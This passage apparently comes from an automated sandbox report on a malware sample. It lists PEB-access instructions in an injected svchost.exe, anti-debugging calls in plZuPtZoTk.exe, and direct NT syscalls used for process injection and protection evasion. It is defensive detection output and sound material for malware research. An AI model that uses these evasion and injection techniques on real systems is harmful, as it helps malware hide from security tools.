            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A20B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E09D5 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtCreateMutant: Direct from: 0x774635CC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtMapViewOfSection: Direct from: 0x77462D1C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtResumeThread: Direct from: 0x774636AC
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtSetInformationProcess: Direct from: 0x77462C5C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtSetInformationThread: Direct from: 0x774563F9
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtClose: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
